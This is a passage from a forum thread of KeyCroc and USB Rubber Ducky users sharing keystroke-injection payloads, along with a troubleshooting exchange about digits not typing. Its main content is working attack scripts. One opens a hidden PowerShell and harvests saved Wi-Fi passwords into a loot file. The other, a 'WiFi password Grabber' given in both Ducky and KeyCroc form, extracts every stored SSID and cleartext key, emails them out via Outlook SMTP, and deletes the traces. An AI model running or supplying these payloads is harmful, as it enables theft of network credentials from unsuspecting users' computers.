Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | Format-Table -AutoSize | Out-File \"\$Croc\loot\wifipass.txt\"" QUACK ENTER QUACK DELAY 1000 # --> Open notepad with the KeyCroc config.txt QUACK STRING "notepad \$Croc\config.txt" QUACK ENTER # --> Edit the config.txt QUACK DELAY 1000 QUACK CONTROL-g QUACK DELAY 500 QUACK STRING "10" QUACK ENTER QUACK STRING "WIFI_SSID" QUACK ENTER QUACK STRING "WIFI_PASS" QUACK ENTER QUACK STRING "SSH ENABLE" QUACK ENTER QUACK GUI r QUACK DELAY 500 QUACK STRING "powershell -NoP -NonI -W Hidden -Exec Bypass" QUACK ENTER QUACK DELAY 1000 QUACK STRING "\$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)" QUACK ENTER QUACK DELAY 500 # --> Open wifipass.txt to copy and paste the SSID and PASSWD QUACK STRING "notepad \$Croc\loot\wifipass.txt" QUACK ENTER QUACK DELAY 1000 # --> Copy and paste the SSID AND PASSWD to the config.txt QUACK CONTROL-g QUACK DELAY 500 QUACK STRING "4" QUACK ENTER QUACK CONTROL-RIGHTARROW QUACK CONTROL-RIGHTARROW # --> Select the hole line QUACK CONTROL-SHIFT-LEFTARROW # --> Copy QUACK CONTROL-c QUACK DELAY 500 # --> Change windows QUACK CONTROL-ALT-TAB QUACK ENTER QUACK DELAY 500 # --> select line to edit QUACK CONTROL-g QUACK DELAY 500 QUACK STRING "11" QUACK ENTER QUACK DELAY 500 QUACK CONTROL-RIGHTARROW # --> SPACEBAR is 00,00,2c QUACK KEYCODE 00,00,2c # --> Paste QUACK CONTROL-v QUACK DELAY 500 QUACK CONTROL-ALT-TAB QUACK DELAY 500 QUACK ENTER QUACK CONTROL-g QUACK DELAY 500 QUACK STRING "4" QUACK ENTER QUACK CONTROL-RIGHTARROW QUACK LEFTARROW QUACK CONTROL-SHIFT-LEFTARROW QUACK CONTROL-c QUACK CONTROL-ALT-TAB QUACK DELAY 500 QUACK ENTER QUACK CONTROL-g QUACK DELAY 500 QUACK STRING "10" QUACK ENTER QUACK CONTROL-RIGHTARROW QUACK KEYCODE 00,00,2c QUACK CONTROL-v QUACK DELAY 500 # --> Save config.txt QUACK CONTROL w QUACK ENTER QUACK DELAY 500 QUACK CONTROL-ALT-TAB QUACK DELETE QUACK DELAY 500 # --> Returning to HID Mode ATTACKMODE HID QUACK DELAY 5000 QUACK UNLOCK Thanks to all getonline.txt
  5. This is a usb rubber ducky payload that i mod into a keycroc payload So if you like usb rubber ducky payloads it can be done WiFi password Grabber Change the following things: ACCOUNT: Your hotmail/outlook account PASSWORD: Your hotmail/outlook password RECEIVER: The email you want to send the content of Log.txt to Note: This script will grab not just the current SSID and password your computer is connecting to but every single SSID and password you have previously connected/saved on your computer. And it works even if the WiFi name contains special characters (such as a smiley face) or spaces. I'm not using gmail here because Google is pretty restrictive when it comes to 3rd party app authentication (let me know if it works with other mail server such as yahoo, zoho, etc) You might want to adjust the DELAY depending on the system you are running e.g set a higher delay time if your system is slow. rubber ducky payload DELAY 1000 REM --> Minimize all windows WINDOWS d REM --> Open cmd WINDOWS r DELAY 500 STRING cmd ENTER DELAY 200 REM --> Get all SSID STRING cd %USERPROFILE% & netsh wlan show profiles | findstr "All" > a.txt ENTER REM --> Create a filter.bat to get all the profile names STRING echo setlocal enabledelayedexpansion^ ENTER ENTER STRING for /f "tokens=5*" %%i in (a.txt) do (^ ENTER ENTER STRING set val=%%i %%j^ ENTER ENTER STRING if "!val:~-1!" == " " set val=!val:~0,-1!^ ENTER ENTER STRING echo !val!^>^>b.txt) > filter.bat ENTER REM --> Run filter.bat and save all profile names in b.txt STRING filter.bat DELAY 300 ENTER REM --> Save all the good stuff in Log.txt and delete the other garbage files STRING (for /f "tokens=*" %i in (b.txt) do @echo SSID: %i & netsh wlan show profiles name="%i" key=clear | findstr /c:"Key Content" & echo.) > Log.txt ENTER DELAY 1000 STRING del a.txt b.txt filter.bat ENTER REM --> Mail Log.txt STRING powershell ENTER DELAY 1000 STRING $SMTPServer = 'smtp-mail.outlook.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSSL = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('<your email here>', '<your password here>') ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = '<your email here>' ENTER STRING $ReportEmail.To.Add('<email to send to>') ENTER STRING $ReportEmail.Subject = 'WiFi key grabber' ENTER STRING $ReportEmail.Body = (Get-Content Log.txt | out-string) ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 3000 STRING exit ENTER DELAY 500 REM --> Delete Log.txt and exit STRING del Log.txt & exit ENTER keycroc payload MATCH wifipass QUACK DELAY 1000 # REM --> Minimize all windows QUACK WINDOWS d # REM --> Open cmd QUACK WINDOWS r QUACK DELAY 1000 QUACK STRING "cmd" QUACK ENTER QUACK DELAY 1000 # REM --> Get all SSID QUACK STRING "cd %USERPROFILE% & netsh wlan show profiles | findstr \"All\" > a.txt" QUACK ENTER # REM --> Create a filter.bat to get all the profile names QUACK STRING "echo setlocal enabledelayedexpansion^" QUACK ENTER QUACK ENTER QUACK STRING "for /f \"tokens=5*\" %%i in (a.txt) do (^" QUACK ENTER QUACK ENTER QUACK STRING "set val=%%i %%j^" QUACK ENTER QUACK ENTER QUACK STRING "if \"!val:~-1!\" == \" \" set val=!val:~0,-1!^" QUACK ENTER QUACK ENTER QUACK STRING "echo !val!^>^>b.txt) > filter.bat" QUACK ENTER # REM --> Run filter.bat and save all profile names in b.txt QUACK STRING "filter.bat" QUACK DELAY 1000 QUACK ENTER # REM --> Save all the good stuff in Log.txt and delete the other garbage files QUACK STRING "(for /f \"tokens=*\" %i in (b.txt) do @echo SSID: %i & netsh wlan show profiles name=\"%i\" key=clear | findstr /c:\"Key Content\" & echo.) > Log.txt" QUACK ENTER QUACK DELAY 1000 QUACK STRING "del a.txt b.txt filter.bat" QUACK ENTER # REM --> Mail Log.txt QUACK STRING "powershell" QUACK ENTER QUACK DELAY 1000 QUACK STRING "\$SMTPServer = 'smtp-mail.outlook.com'" QUACK ENTER QUACK STRING "\$SMTPInfo = New-Object Net.Mail.SmtpClient(\$SmtpServer, 587)" QUACK ENTER QUACK STRING "\$SMTPInfo.EnableSSL = \$true" QUACK ENTER QUACK STRING "\$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential(\"your email here\", \"your password here\")" QUACK ENTER QUACK STRING "\$ReportEmail = New-Object System.Net.Mail.MailMessage" QUACK ENTER QUACK STRING "\$ReportEmail.From = 'your email here'" QUACK ENTER QUACK STRING "\$ReportEmail.To.Add('email to send to')" QUACK ENTER QUACK STRING "\$ReportEmail.Subject = 'WiFi key grabber'" QUACK ENTER QUACK STRING "\$ReportEmail.Body = (Get-Content Log.txt | out-string)" QUACK ENTER QUACK STRING "\$SMTPInfo.Send(\$ReportEmail)" QUACK ENTER QUACK DELAY 3000 QUACK STRING "exit" QUACK ENTER QUACK DELAY 1000 # REM --> Delete Log.txt and exit QUACK STRING "del Log.txt & exit" QUACK ENTER
  6. BIG BIG THANKS TO Cribbit and RootJunky yes my Num lock was onπŸ˜• payloads are working my bad THANKS AGIAN GUYS
  7. Iam having trouble with all my payloads because they will not print any numbers at the STRING lines Iam doing something wrong? Is anyone else have the same problem with adding numbers to the STRING?
  8. Hi been play around with payloads with my keyCroc when i use the STRING " " with numbers it will not print the number. as you can see with the output no numbers get printed I tried without the quotient and i get the same result so how do you get to print number in a string? this is the payload MATCH 12 QUACK STRING "1" QUACK ENTER QUACK STRING "2" QUACK ENTER QUACK STRING "3" QUACK ENTER QUACK STRING "100" QUACK ENTER QUACK STRING "\100" QUACK ENTER QUACK STRING "\$300" QUACK ENTER QUACK STRING "\$1" QUACK ENTER QUACK STRING "$1" QUACK ENTER this is the output in terminal └──╼ $12 - this is the match └──╼ $ └──╼ $~ └──╼ $^[[2~ └──╼ $\^[[2~ └──╼ $$~^[[2~ └──╼ $$ this is the output in text editor notepad 12 \ $ $ I know about "1234" - str - string 1234 -int - intrgers int() -convert a str to a int and so on does this work the same for the croc? can anyone else get the QUACK STRING " " with any numbers between the quotient to print back or is it just my croc? any help thanks
×
×
  • Create New...